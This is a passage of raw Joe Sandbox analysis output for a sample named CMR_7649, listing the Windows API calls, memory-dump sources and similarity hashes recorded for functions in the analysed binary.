                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: __lock_file
                                                • String ID:
                                                • API String ID: 3031932315-0
                                                • Opcode ID: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                • Instruction ID: 324047821ed349453e17c5e7f52af34d31ade4ebcb64e32b23ce3c6ad3b356a0
                                                • Opcode Fuzzy Hash: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                • Instruction Fuzzy Hash: FF011E71801219EBCF21AFA5C8028DF7B71AF44764F11851BF824551A1E7398AE2DBD9
                                                APIs
                                                • WriteFile.KERNELBASE(?,?,?,?,00000000,?,?,?,004263D0,?,00487ACC,00000003,0040DE90,?,?,00000001), ref: 00443E54
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: FileWrite
                                                • String ID:
                                                • API String ID: 3934441357-0
                                                • Opcode ID: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                                                • Instruction ID: f8d6e32d6ecef3e6c51c5ea05c7ff41eb941b2b6d152ec47b845c679c5cedb0e
                                                • Opcode Fuzzy Hash: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                                                • Instruction Fuzzy Hash: 6BE01276100318ABDB10DF98D844FDA77BCEF48765F10891AFA048B200C7B4EA908BE4
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: __wfsopen
                                                • String ID:
                                                • API String ID: 197181222-0
                                                • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                • Instruction ID: b34ddb7a850719c89311ce964fc9f65e9e9400c6a390d5c1cbb008c3125e494a
                                                • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                • Instruction Fuzzy Hash: 82C092B244020C77CF112A93EC02F9A3F1E9BC0764F058021FB1C1A162AA77EAA19689
                                                APIs
                                                • CloseHandle.KERNELBASE(?,?,00426FBF), ref: 0040DA3D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: CloseHandle
                                                • String ID:
                                                • API String ID: 2962429428-0
                                                • Opcode ID: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                                                • Instruction ID: 552ddd844a8bbede063c80161f66c4637379340f91e2bb70a518b226642b2913
                                                • Opcode Fuzzy Hash: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                                                • Instruction Fuzzy Hash: B9E045B4A04B008BC6308F5BE444416FBF8EEE46203108E1FD4A6C2A64C3B4A1498F50
                                                APIs
                                                • Sleep.KERNELBASE(000001F4), ref: 03EDE2C1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1698859580.0000000003EDC000.00000040.00000020.00020000.00000000.sdmp, Offset: 03EDC000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3edc000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Sleep
                                                • String ID:
                                                • API String ID: 3472027048-0
                                                • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                • Instruction ID: 6c63dfe697d2c20f6e870400f2dfab799cdbcd8ee6d05acc4d211d73035cff9c
                                                • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                • Instruction Fuzzy Hash: F3E0E67494010DDFDB00EFB8D54D69E7FF4EF04301F1002A1FD01D2280D6309D508A62
                                                APIs
                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
                                                • DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
                                                • GetKeyState.USER32(00000011), ref: 0047C92D
                                                • GetKeyState.USER32(00000009), ref: 0047C936
                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
                                                • GetKeyState.USER32(00000010), ref: 0047C953
                                                • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
                                                • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
                                                • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
                                                • _wcsncpy.LIBCMT ref: 0047CA29
                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
                                                • SendMessageW.USER32 ref: 0047CA7F
                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
                                                • SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
                                                • ImageList_SetDragCursorImage.COMCTL32(00AFD7D8,00000000,00000000,00000000), ref: 0047CB9B
                                                • ImageList_BeginDrag.COMCTL32(00AFD7D8,00000000,000000F8,000000F0), ref: 0047CBAC
                                                • SetCapture.USER32(?), ref: 0047CBB6
                                                • ClientToScreen.USER32(?,?), ref: 0047CC17
                                                • ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
                                                • ReleaseCapture.USER32 ref: 0047CC3A
                                                • GetCursorPos.USER32(?), ref: 0047CC72
                                                • ScreenToClient.USER32(?,?), ref: 0047CC80
                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
                                                • SendMessageW.USER32 ref: 0047CD12
                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
                                                • SendMessageW.USER32 ref: 0047CD80
                                                • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
                                                • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
                                                • GetCursorPos.USER32(?), ref: 0047CDC8
                                                • ScreenToClient.USER32(?,?), ref: 0047CDD6
                                                • GetParent.USER32(00000000), ref: 0047CDF7
                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
                                                • SendMessageW.USER32 ref: 0047CE93
                                                • ClientToScreen.USER32(?,?), ref: 0047CEEE
                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,00A01B20,00000000,?,?,?,?), ref: 0047CF1C
                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
                                                • SendMessageW.USER32 ref: 0047CF6B
                                                • ClientToScreen.USER32(?,?), ref: 0047CFB5
                                                • TrackPopupMenuEx.USER32(?,00000080,?,?,00A01B20,00000000,?,?,?,?), ref: 0047CFE6
                                                • GetWindowLongW.USER32(?,000000F0), ref: 0047D086
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                • String ID: @GUI_DRAGID$F
                                                • API String ID: 3100379633-4164748364
                                                • Opcode ID: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                • Instruction ID: 980357f173c9be8e312ccaa606797ee7157b6525bda81ee0817efdfc4c954517
                                                • Opcode Fuzzy Hash: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                • Instruction Fuzzy Hash: F842AD706043419FD714DF28C884FABB7A5FF89700F14865EFA489B291C7B8E846CB5A
                                                APIs
                                                • GetForegroundWindow.USER32 ref: 00434420
                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                                                • IsIconic.USER32(?), ref: 0043444F
                                                • ShowWindow.USER32(?,00000009), ref: 0043445C
                                                • SetForegroundWindow.USER32(?), ref: 0043446A
                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                                                • GetCurrentThreadId.KERNEL32 ref: 00434485
                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
                                                • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
                                                • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
                                                • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
                                                • SetForegroundWindow.USER32(00000000), ref: 004344B7
                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
                                                • keybd_event.USER32(00000012,00000000), ref: 004344CF
                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
                                                • keybd_event.USER32(00000012,00000000), ref: 004344E6
                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                                                • keybd_event.USER32(00000012,00000000), ref: 004344FD
                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
                                                • keybd_event.USER32(00000012,00000000), ref: 00434514
                                                • SetForegroundWindow.USER32(00000000), ref: 0043451E
                                                • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                                                • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                • String ID: Shell_TrayWnd
                                                • API String ID: 2889586943-2988720461
                                                • Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                • Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
                                                • Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                • Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
                                                APIs
                                                • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                                                • CloseHandle.KERNEL32(?), ref: 004463A0
                                                • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
                                                • GetProcessWindowStation.USER32 ref: 004463D1
                                                • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                                                • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                                                • _wcslen.LIBCMT ref: 00446498
                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                • _wcsncpy.LIBCMT ref: 004464C0
                                                • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
                                                • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
                                                • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
                                                • UnloadUserProfile.USERENV(?,?), ref: 00446555
                                                • CloseWindowStation.USER32(00000000), ref: 0044656C
                                                • CloseDesktop.USER32(?), ref: 0044657A
                                                • SetProcessWindowStation.USER32(?), ref: 00446588
                                                • CloseHandle.KERNEL32(?), ref: 00446592
                                                • DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
                                                • String ID: $@OH$default$winsta0
                                                • API String ID: 3324942560-3791954436
                                                • Opcode ID: b5525f1ade2b057c7f9e31d74da72dff15b4031de69b799d2ab87430ccd2f155
                                                • Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
                                                • Opcode Fuzzy Hash: b5525f1ade2b057c7f9e31d74da72dff15b4031de69b799d2ab87430ccd2f155
                                                • Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
                                                APIs
                                                  • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                  • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 0043392E
                                                  • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 00433950
                                                  • Part of subcall function 00433908: __wcsicoll.LIBCMT ref: 00433974
                                                  • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                • _wcscat.LIBCMT ref: 0044BD94
                                                • _wcscat.LIBCMT ref: 0044BDBD
                                                • __wsplitpath.LIBCMT ref: 0044BDEA
                                                • FindFirstFileW.KERNEL32(?,?), ref: 0044BE02
                                                • _wcscpy.LIBCMT ref: 0044BE71
                                                • _wcscat.LIBCMT ref: 0044BE83
                                                • _wcscat.LIBCMT ref: 0044BE95
                                                • lstrcmpiW.KERNEL32(?,?), ref: 0044BEC1
                                                • DeleteFileW.KERNEL32(?), ref: 0044BED3
                                                • MoveFileW.KERNEL32(?,?), ref: 0044BEF3
                                                • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0A
                                                • DeleteFileW.KERNEL32(?), ref: 0044BF15
                                                • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2C
                                                • FindClose.KERNEL32(00000000), ref: 0044BF33
                                                • MoveFileW.KERNEL32(?,?), ref: 0044BF4F
                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF64
                                                • FindClose.KERNEL32(00000000), ref: 0044BF7C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
                                                • String ID: \*.*
                                                • API String ID: 2188072990-1173974218
                                                • Opcode ID: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                                                • Instruction ID: 72a2fd59153234373391f972af8bc7e503bf673df65afccb4f4ecee040a4f935
                                                • Opcode Fuzzy Hash: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                                                • Instruction Fuzzy Hash: E25167B2408384AAD734DB50DC45EDF73E9AFC8304F544E1EF68982141EB75D249CBA6
                                                APIs
                                                • FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
                                                • FindClose.KERNEL32(00000000), ref: 00478924
                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
                                                • __swprintf.LIBCMT ref: 004789D3
                                                • __swprintf.LIBCMT ref: 00478A1D
                                                • __swprintf.LIBCMT ref: 00478A4B
                                                • __swprintf.LIBCMT ref: 00478A79
                                                  • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
                                                  • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C
                                                • __swprintf.LIBCMT ref: 00478AA7
                                                • __swprintf.LIBCMT ref: 00478AD5
                                                • __swprintf.LIBCMT ref: 00478B03
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
                                                • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                • API String ID: 999945258-2428617273
                                                • Opcode ID: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                • Instruction ID: 8fd0730747e081185947bc4026d2fd3d0a29cbe563c255e8678d3cf3417a7967
                                                • Opcode Fuzzy Hash: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                • Instruction Fuzzy Hash: 32719772204300ABC310EF55CC85FAFB7E9AF88705F504D2FF645962D1E6B9E944875A
                                                APIs
                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                • __wsplitpath.LIBCMT ref: 00403492
                                                  • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                • _wcscpy.LIBCMT ref: 004034A7
                                                • _wcscat.LIBCMT ref: 004034BC
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                  • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                                                  • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                                                • _wcscpy.LIBCMT ref: 004035A0
                                                • _wcslen.LIBCMT ref: 00403623
                                                • _wcslen.LIBCMT ref: 0040367D
                                                Strings
                                                • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                                                • _, xrefs: 0040371C
                                                • Unterminated string, xrefs: 00428348
                                                • Error opening the file, xrefs: 00428231
                                                Similarity
                                                • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                                                • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                                • API String ID: 3393021363-188983378
                                                • Opcode ID: 7ca9ad7ef7208bb045d11657cd721343b767352ed1bccac0ebefd6c576abac4e
                                                • Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
                                                • Opcode Fuzzy Hash: 7ca9ad7ef7208bb045d11657cd721343b767352ed1bccac0ebefd6c576abac4e
                                                • Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
                                                APIs
                                                • FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
                                                • GetFileAttributesW.KERNEL32(?), ref: 00431AE7
                                                • SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
                                                • FindClose.KERNEL32(00000000), ref: 00431B20
                                                • FindClose.KERNEL32(00000000), ref: 00431B34
                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
                                                • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
                                                • FindClose.KERNEL32(00000000), ref: 00431BCD
                                                • FindClose.KERNEL32(00000000), ref: 00431BDB
                                                Strings
                                                Similarity
                                                • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                • String ID: *.*
                                                • API String ID: 1409584000-438819550
                                                • Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                • Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
                                                • Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                • Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
                                                APIs
                                                • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
                                                • __swprintf.LIBCMT ref: 00431C2E
                                                • _wcslen.LIBCMT ref: 00431C3A
                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
                                                Strings
                                                Similarity
                                                • API ID: CreateDirectoryFullNamePath__swprintf_wcslen
                                                • String ID: :$\$\??\%s
                                                • API String ID: 2192556992-3457252023
                                                • Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                • Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
                                                • Opcode Fuzzy Hash: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                • Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8
                                                APIs
                                                • GetLocalTime.KERNEL32(?), ref: 004722A2
                                                • __swprintf.LIBCMT ref: 004722B9
                                                • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                                                • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
                                                • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                                                • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
                                                • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
                                                • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
                                                • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
                                                • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
                                                • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
                                                Strings
                                                Similarity
                                                • API ID: FolderPath$LocalTime__swprintf
                                                • String ID: %.3d
                                                • API String ID: 3337348382-986655627
                                                • Opcode ID: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                                • Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
